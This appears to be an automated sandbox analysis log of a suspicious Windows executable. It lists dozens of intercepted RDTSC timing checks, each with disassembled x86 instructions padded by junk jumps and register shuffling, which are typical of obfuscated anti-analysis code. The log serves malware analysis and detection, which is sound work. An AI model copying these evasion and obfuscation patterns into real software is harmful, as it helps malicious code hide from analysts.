Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71603DF second address: 716040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43E8C1FDDDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716040A second address: 716045F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F43E91C545Eh 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 jmp 00007F43E91C5460h 0x00000019 mov eax, dword ptr [ebx+50h] 0x0000001c jmp 00007F43E91C5460h 0x00000021 mov dword ptr [esi+14h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716045F second address: 7160463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160463 second address: 7160469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160469 second address: 716046E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716046E second address: 7160494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F43E91C5460h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+54h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, 29A9h 0x00000017 mov dx, ax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160494 second address: 716049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716049A second address: 716049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716049E second address: 71604E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov di, C524h 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F43E8C1FDDDh 0x00000018 or ax, AB66h 0x0000001d jmp 00007F43E8C1FDE1h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+58h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F43E8C1FDDDh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71604E8 second address: 716050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43E91C545Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716050F second address: 7160550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 06h 0x00000005 jmp 00007F43E8C1FDE8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+5Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F43E8C1FDDDh 0x00000019 jmp 00007F43E8C1FDDBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160550 second address: 71605A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0E6770E6h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+20h], eax 0x00000010 pushad 0x00000011 mov edx, 64D2566Ch 0x00000016 jmp 00007F43E91C5465h 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+60h] 0x0000001f jmp 00007F43E91C545Eh 0x00000024 mov dword ptr [esi+24h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F43E91C5467h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71605A9 second address: 71605C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71605C1 second address: 71605C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71605C5 second address: 7160606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f movzx ecx, dx 0x00000012 popad 0x00000013 mov dword ptr [esi+28h], eax 0x00000016 jmp 00007F43E8C1FDE1h 0x0000001b mov eax, dword ptr [ebx+68h] 0x0000001e jmp 00007F43E8C1FDDEh 0x00000023 mov dword ptr [esi+2Ch], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160606 second address: 716060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716060A second address: 7160610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160610 second address: 716061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716061F second address: 7160623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160623 second address: 716064A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43E91C5467h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716064A second address: 7160667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160667 second address: 7160677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160677 second address: 716067B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716067B second address: 71606A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F43E91C5463h 0x00000013 pop ecx 0x00000014 mov bx, B96Ch 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov bh, 2Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71606A6 second address: 7160700 instructions: 0x00000000 rdtsc 0x00000002 mov si, ECB3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43E8C1FDE4h 0x00000017 or si, 8AB8h 0x0000001c jmp 00007F43E8C1FDDBh 0x00000021 popfd 0x00000022 jmp 00007F43E8C1FDE8h 0x00000027 popad 0x00000028 mov word ptr [esi+32h], ax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160700 second address: 716071D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716071D second address: 7160723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160723 second address: 7160727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160727 second address: 71607C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F43E8C1FDE5h 0x00000015 or eax, 539C5016h 0x0000001b jmp 00007F43E8C1FDE1h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F43E8C1FDE0h 0x00000027 sbb ecx, 117B9438h 0x0000002d jmp 00007F43E8C1FDDBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esi+34h], eax 0x00000037 jmp 00007F43E8C1FDE6h 0x0000003c mov eax, dword ptr [ebx+18h] 0x0000003f jmp 00007F43E8C1FDE0h 0x00000044 mov dword ptr [esi+38h], eax 0x00000047 pushad 0x00000048 pushad 0x00000049 mov ebx, eax 0x0000004b mov di, si 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 mov ebx, ecx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71607C3 second address: 71607FE instructions: 0x00000000 rdtsc 0x00000002 mov cl, EAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+1Ch] 0x0000000a pushad 0x0000000b mov ah, bh 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 jmp 00007F43E91C545Ah 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esi+3Ch], eax 0x0000001b jmp 00007F43E91C5460h 0x00000020 mov eax, dword ptr [ebx+20h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov eax, 446407A3h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71607FE second address: 716086D instructions: 0x00000000 rdtsc 0x00000002 mov si, 7AFFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F43E8C1FDE4h 0x0000000e sub ch, FFFFFFE8h 0x00000011 jmp 00007F43E8C1FDDBh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esi+40h], eax 0x0000001b pushad 0x0000001c mov al, 6Fh 0x0000001e mov al, bh 0x00000020 popad 0x00000021 lea eax, dword ptr [ebx+00000080h] 0x00000027 jmp 00007F43E8C1FDE8h 0x0000002c push 00000001h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F43E8C1FDE7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716086D second address: 7160882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43E91C545Fh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160882 second address: 71608CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007F43E8C1FDE2h 0x0000000d mov dword ptr [esp], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43E8C1FDDEh 0x00000017 add cx, 4E68h 0x0000001c jmp 00007F43E8C1FDDBh 0x00000021 popfd 0x00000022 mov di, cx 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bx, 7162h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71608CF second address: 71608D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71608D5 second address: 71608D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71608D9 second address: 7160917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F43E91C545Fh 0x00000012 sbb ch, 0000000Eh 0x00000015 jmp 00007F43E91C5469h 0x0000001a popfd 0x0000001b mov cx, E417h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160917 second address: 716096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43E8C1FDE3h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F43E8C1FDE9h 0x0000000f sub ecx, 619614A6h 0x00000015 jmp 00007F43E8C1FDE1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esp], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ah, 05h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716096B second address: 7160975 instructions: 0x00000000 rdtsc 0x00000002 mov al, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov al, 8Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71609D4 second address: 71609F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71609F0 second address: 7160A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4459544121h 0x0000000e jmp 00007F43E91C5467h 0x00000013 mov eax, dword ptr [ebp-0Ch] 0x00000016 jmp 00007F43E91C5466h 0x0000001b mov dword ptr [esi+04h], eax 0x0000001e pushad 0x0000001f mov cl, FEh 0x00000021 mov di, 62BEh 0x00000025 popad 0x00000026 lea eax, dword ptr [ebx+78h] 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F43E91C545Ch 0x00000032 and ax, 2888h 0x00000037 jmp 00007F43E91C545Bh 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160A5D second address: 7160AC2 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 29F898FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push 00000001h 0x0000000c pushad 0x0000000d mov ah, A8h 0x0000000f movsx edi, ax 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F43E8C1FDE4h 0x00000019 push eax 0x0000001a jmp 00007F43E8C1FDDBh 0x0000001f nop 0x00000020 jmp 00007F43E8C1FDE6h 0x00000025 lea eax, dword ptr [ebp-08h] 0x00000028 jmp 00007F43E8C1FDE0h 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160AC2 second address: 7160AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160AC6 second address: 7160ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160ACA second address: 7160AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160B42 second address: 7160BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F43E8C1FDE0h 0x00000010 js 00007F4458F9E925h 0x00000016 jmp 00007F43E8C1FDE0h 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e pushad 0x0000001f jmp 00007F43E8C1FDDEh 0x00000024 jmp 00007F43E8C1FDE2h 0x00000029 popad 0x0000002a mov dword ptr [esi+08h], eax 0x0000002d pushad 0x0000002e mov bl, al 0x00000030 push eax 0x00000031 push edx 0x00000032 mov bx, 3E2Ch 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160BB1 second address: 7160C2A instructions: 0x00000000 rdtsc 0x00000002 mov edi, 671C1118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lea eax, dword ptr [ebx+70h] 0x0000000d jmp 00007F43E91C5467h 0x00000012 push 00000001h 0x00000014 jmp 00007F43E91C5466h 0x00000019 nop 0x0000001a jmp 00007F43E91C5460h 0x0000001f push eax 0x00000020 jmp 00007F43E91C545Bh 0x00000025 nop 0x00000026 jmp 00007F43E91C5466h 0x0000002b lea eax, dword ptr [ebp-18h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C2A second address: 7160C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C2E second address: 7160C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C32 second address: 7160C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C38 second address: 7160C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C47 second address: 7160C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C4B second address: 7160C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov cx, 5557h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C5D second address: 7160C96 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F43E8C1FDE8h 0x00000014 xor ax, 1C28h 0x00000019 jmp 00007F43E8C1FDDBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160CC2 second address: 7160D17 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edi, eax 0x00000009 jmp 00007F43E91C5468h 0x0000000e test edi, edi 0x00000010 jmp 00007F43E91C5460h 0x00000015 js 00007F4459543E10h 0x0000001b jmp 00007F43E91C5460h 0x00000020 mov eax, dword ptr [ebp-14h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx edi, cx 0x00000029 mov edx, eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160D17 second address: 7160D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov dl, E1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cl, dl 0x00000012 mov di, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160D2D second address: 7160D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E91C5465h 0x00000009 sbb ecx, 3DC18876h 0x0000000f jmp 00007F43E91C5461h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F43E91C5469h 0x00000026 or ecx, 3A170486h 0x0000002c jmp 00007F43E91C5461h 0x00000031 popfd 0x00000032 movzx esi, dx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160D9F second address: 7160DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DBC second address: 7160DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 775606ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DDE second address: 7160DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DE2 second address: 7160DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DF5 second address: 7160ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov di, D130h 0x00000010 jmp 00007F43E8C1FDE9h 0x00000015 popad 0x00000016 lock cmpxchg dword ptr [edx], ecx 0x0000001a jmp 00007F43E8C1FDDEh 0x0000001f pop edi 0x00000020 pushad 0x00000021 jmp 00007F43E8C1FDDEh 0x00000026 mov edx, esi 0x00000028 popad 0x00000029 test eax, eax 0x0000002b pushad 0x0000002c mov ah, DFh 0x0000002e pushfd 0x0000002f jmp 00007F43E8C1FDDFh 0x00000034 add ax, 0E9Eh 0x00000039 jmp 00007F43E8C1FDE9h 0x0000003e popfd 0x0000003f popad 0x00000040 jne 00007F4458F9E625h 0x00000046 pushad 0x00000047 mov cx, 3E03h 0x0000004b mov ch, B7h 0x0000004d popad 0x0000004e mov edx, dword ptr [ebp+08h] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push esi 0x00000055 pop ebx 0x00000056 pushfd 0x00000057 jmp 00007F43E8C1FDE8h 0x0000005c or cl, FFFFFFF8h 0x0000005f jmp 00007F43E8C1FDDBh 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160ECC second address: 7160F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b jmp 00007F43E91C545Eh 0x00000010 mov dword ptr [edx], eax 0x00000012 pushad 0x00000013 mov cl, bl 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+04h] 0x00000019 pushad 0x0000001a mov di, cx 0x0000001d mov ecx, 5AC415CDh 0x00000022 popad 0x00000023 mov dword ptr [edx+04h], eax 0x00000026 jmp 00007F43E91C5468h 0x0000002b mov eax, dword ptr [esi+08h] 0x0000002e pushad 0x0000002f mov bl, ch 0x00000031 mov bh, 6Eh 0x00000033 popad 0x00000034 mov dword ptr [edx+08h], eax 0x00000037 jmp 00007F43E91C5462h 0x0000003c mov eax, dword ptr [esi+0Ch] 0x0000003f pushad 0x00000040 pushad 0x00000041 push esi 0x00000042 pop ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160F4E second address: 7160F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F43E8C1FDE5h 0x0000000b pop eax 0x0000000c popad 0x0000000d mov dword ptr [edx+0Ch], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F43E8C1FDE8h 0x00000019 xor ax, 1938h 0x0000001e jmp 00007F43E8C1FDDBh 0x00000023 popfd 0x00000024 mov bl, cl 0x00000026 popad 0x00000027 rdtsc
